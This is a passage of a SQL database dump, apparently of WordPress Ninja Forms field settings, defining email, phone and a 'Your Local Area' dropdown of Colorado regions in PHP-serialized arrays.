ne','0','user_phone','0'),(6130,214,'user_info_field_group','1','user_info_field_group','1'),(6131,214,'show_help','0','show_help','0'),(6132,214,'help_text','','help_text',''),(6133,214,'calc_auto_include','0','calc_auto_include','0'),(6134,214,'calc_option','0','calc_option','0'),(6135,214,'placeholder','','placeholder',''),(6136,214,'disable_input','0','disable_input','0'),(6137,214,'input_limit','','input_limit',''),(6138,214,'input_limit_type','char','input_limit_type','char'),(6139,214,'input_limit_msg','','input_limit_msg',''),(6140,214,'user_state','0','user_state','0'),(6141,214,'autocomplete_off','0','autocomplete_off','0'),(6142,214,'num_sort','0','num_sort','0'),(6143,214,'admin_label','','admin_label',''),(6144,214,'user_info_field_group_name','','user_info_field_group_name',''),(6145,214,'user_info_field_group_custom','','user_info_field_group_custom',''),(6146,214,'show_desc','0','show_desc','0'),(6147,214,'desc_pos','none','desc_pos','none'),(6148,214,'desc_text','','desc_text',''),(6149,214,'element_class','','element_class',''),(6150,214,'required','1','required','1'),(6151,214,'key','email_168','key','email_168'),(6152,214,'default','','default',''),(6153,214,'container_class','one-half first','container_class','one-half first'),(6154,214,'parent_id','20','parent_id','20'),(6155,215,'objectType','Field','objectType','Field'),(6156,215,'objectDomain','fields','objectDomain','fields'),(6157,215,'editActive','','editActive',''),(6158,215,'order','5','order','5'),(6159,215,'type','phone','type','phone'),(6160,215,'def_id','15','def_id','15'),(6161,215,'label','Phone','label','Phone'),(6162,215,'label_pos','above','label_pos','above'),(6163,215,'mask','(999) 999-9999','mask','(999) 999-9999'),(6164,215,'datepicker','0','datepicker','0'),(6165,215,'first_name','0','first_name','0'),(6166,215,'last_name','0','last_name','0'),(6167,215,'from_name','0','from_name','0'),(6168,215,'user_address_1','0','user_address_1','0'),(6169,215,'user_address_2','0','user_address_2','0'),(6170,215,'user_city','0','user_city','0'),(6171,215,'user_zip','0','user_zip','0'),(6172,215,'user_email','0','user_email','0'),(6173,215,'user_info_field_group','1','user_info_field_group','1'),(6174,215,'show_help','0','show_help','0'),(6175,215,'help_text','','help_text',''),(6176,215,'calc_auto_include','0','calc_auto_include','0'),(6177,215,'calc_option','0','calc_option','0'),(6178,215,'placeholder','','placeholder',''),(6179,215,'disable_input','0','disable_input','0'),(6180,215,'input_limit','','input_limit',''),(6181,215,'input_limit_type','char','input_limit_type','char'),(6182,215,'input_limit_msg','','input_limit_msg',''),(6183,215,'user_state','0','user_state','0'),(6184,215,'autocomplete_off','0','autocomplete_off','0'),(6185,215,'num_sort','0','num_sort','0'),(6186,215,'admin_label','','admin_label',''),(6187,215,'user_info_field_group_name','','user_info_field_group_name',''),(6188,215,'user_info_field_group_custom','','user_info_field_group_custom',''),(6189,215,'show_desc','0','show_desc','0'),(6190,215,'desc_pos','none','desc_pos','none'),(6191,215,'desc_text','','desc_text',''),(6192,215,'element_class','','element_class',''),(6193,215,'required','1','required','1'),(6194,215,'key','phone_169','key','phone_169'),(6195,215,'default','','default',''),(6196,215,'container_class','one-half','container_class','one-half'),(6197,215,'manual_key','','manual_key',''),(6198,215,'custom_mask','','custom_mask',''),(6199,215,'parent_id','20','parent_id','20'),(6200,216,'objectType','Field','objectType','Field'),(6201,216,'objectDomain','fields','objectDomain','fields'),(6202,216,'editActive','','editActive',''),(6203,216,'order','6','order','6'),(6204,216,'type','listselect','type','listselect'),(6205,216,'label','Your Local Area','label','Your Local Area'),(6206,216,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6207,216,'label_pos','above','label_pos','above'),(6208,216,'list_type','dropdown','list_type','dropdown'),(6209,216,'multi_size','5','multi_size','5'),(6210,216,'list_show_value','1','list_show_value','1'),(6211,216,'list','a:0:{}','list','a:0:{}'),(6212,216,'user_info_field_group','','user_info_field_group',''),(6213,216,'calc_auto_include','0','calc_auto_include','0'),(6214,216,'user_state','0','user_state','0'),(6215,216,'num_sort','0','num_sort','0'),(6216,216,'admin_label','','admin_label',''),(6217,216,'show_help','0','show_help','0'),(6218,216,'help_text','','help_text',''),(6219,216,'show_desc','0','show_desc','0'),(6220,216,'desc_pos','none','desc_pos','none'),(6221,216,'desc_text','','desc_text',''),(6222,216,'element_class','','element_class',''),(6223,216,'required','1','required','1'),(6224,216,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 